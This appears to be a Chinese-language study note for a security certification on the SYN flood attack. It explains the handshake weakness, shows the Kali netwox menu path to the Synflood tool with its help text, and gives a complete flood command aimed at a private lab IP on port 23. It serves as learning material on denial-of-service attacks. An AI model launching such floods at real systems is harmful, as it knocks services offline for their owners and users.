HCIE-Security安全-SYN攻擊（半開攻擊）

SYN攻擊

SYN包：表示連接請求。

攻擊原理

利用了TCP的三次握手機制，A給B發送SYN數據包，B收到該數據包並給A回覆一個SYN+ACK數據包，A收到該數據包不去回覆B對上一個數據包的ACK確認，則會造成B一直等待這個ACK確認，從而會消耗B的主機緩存資源。

SYN攻擊屬於拒絕式服務攻擊（DOS），如果有成百上千個主機，分佈在不同的區域，同時向一個被攻擊者發送大量的SYN數據包，這也就是分佈式拒絕式服務攻擊（DDOS）,其破壞量非常之大。

SYN氾濫攻擊的netwox工具序號爲76

root@kali:/home/kali# netwox
Netwox toolbox version 5.39.0. Netwib library version 5.39.0.

######################## MAIN MENU #########################
 0 - leave netwox
 3 - search tools
 4 - display help of one tool
 5 - run a tool selecting parameters on command line
 6 - run a tool selecting parameters from keyboard
 a + information
 b + network protocol
 c + application protocol
 d + sniff (capture network packets)
 e + spoof (create and send packets)
 f + record (file containing captured packets)
 g + client
 h + server
 i + ping (check if a computer if reachable)
 j + traceroute (obtain list of gateways)
 k + scan (computer and port discovery)
 l + network audit
 m + brute force (check if passwords are weak)
 n + remote administration
 o + tools not related to network
Select a node (key in 03456abcdefghijklmno): b

##################### network protocol #####################
 0 - leave netwox
 1 - go to main menu
 2 - go to previous menu
 3 - search tools
 4 - display help of one tool
 5 - run a tool selecting parameters on command line
 6 - run a tool selecting parameters from keyboard
 a + Ethernet
 b + IP
 c + UDP
 d + TCP
 e + ICMP
 f + ARP
Select a node (key in 0123456abcdef): d

########################### TCP ############################
 0 - leave netwox
 1 - go to main menu
 2 - go to previous menu
 3 - search tools
 4 - display help of one tool
 5 - run a tool selecting parameters on command line
 6 - run a tool selecting parameters from keyboard
 a + TCP spoof
 b + TCP client
 c + TCP server
 d + network audit using TCP
 e + dns
 f + ftp
 g + http
 h + ident
 i + irc
 j + nntp
 k + smb
 l + smtp
 m + telnet
 n + whois
Select a node (key in 0123456abcdefghijklmn): d

################# network audit using TCP ##################
 0 - leave netwox
 1 - go to main menu
 2 - go to previous menu
 3 - search tools
 4 - display help of one tool
 5 - run a tool selecting parameters on command line
 6 - run a tool selecting parameters from keyboard
 a - 76:Synflood
 b - 77:Check if seqnum are predictible
 c - 78:Reset every TCP packet
 d - 79:Acknowledge every TCP SYN
Select a node (key in 0123456abcd): a

################# help for tool number 76 ##################
Title: Synflood
+------------------------------------------------------------------------+
| This tool sends a lot of TCP SYN packets.                              |
| It permits to check how a firewall behaves when receiving packets      |
| which have to be ignored.                                              |
| Parameter --spoofip indicates how to generate link layer for spoofing. |
| Values 'best', 'link' or 'raw' are common choices for --spoofip. Here  |
| is the list of accepted values:                                        |
|  - 'raw' means to spoof at IP4/IP6 level (it uses system IP stack). If |
|    a firewall is installed, or on some systems, this might not work.   |
|  - 'linkf' means to spoof at link level (currently, only Ethernet is   |
|    supported). The 'f' means to Fill source Ethernet address.          |
|    However, if source IP address is spoofed, it might be impossible    |
|    to Fill it. So, linkf will not work: use linkb or linkfb instead.   |
|  - 'linkb' means to spoof at link level. The 'b' means to left a Blank |
|    source Ethernet address (0:0:0:0:0:0, do not try to Fill it).       |
|  - 'linkfb' means to spoof at link level. The 'f' means to try to Fill |
|    source Ethernet address, but if it is not possible, it is left      |
|    Blank.                                                              |
|  - 'rawlinkf' means to try 'raw', then try 'linkf'                     |
|  - 'rawlinkb' means to try 'raw', then try 'linkb'                     |
|  - 'rawlinkfb' means to try 'raw', then try 'linkfb'                   |
|  - 'linkfraw' means to try 'linkf', then try 'raw'                     |
|  - 'linkbraw' means to try 'linkb', then try 'raw'                     |
|  - 'linkfbraw' means to try 'linkfb', then try 'raw'                   |
|  - 'link' is an alias for 'linkfb'                                     |
|  - 'rawlink' is an alias for 'rawlinkfb'                               |
|  - 'linkraw' is an alias for 'linkfbraw'                               |
|  - 'best' is an alias for 'linkraw'. It should work in all cases.      |
|                                                                        |
| This tool may need to be run with admin privilege in order to spoof.   |
+------------------------------------------------------------------------+
Usage: netwox 76 -i ip -p port [-s spoofip]
Parameters:
 -i|--dst-ip ip                 destination IP address {5.6.7.8}
 -p|--dst-port port             destination port number {80}
 -s|--spoofip spoofip           IP spoof initialization type {linkbraw}
Example: netwox 76 -i "5.6.7.8" -p "80"
Example: netwox 76 --dst-ip "5.6.7.8" --dst-port "80"
Press 'r' or 'k' to run this tool, or any other key to continue 

攻擊代碼

sudo netwox 76 -i 192.168.248.128 -p 23
//攻擊目標服務器的特定端口

效果

發送完這條指令後，我的電腦風扇也已經開始使勁的吹了，趕緊關了關了^ - ^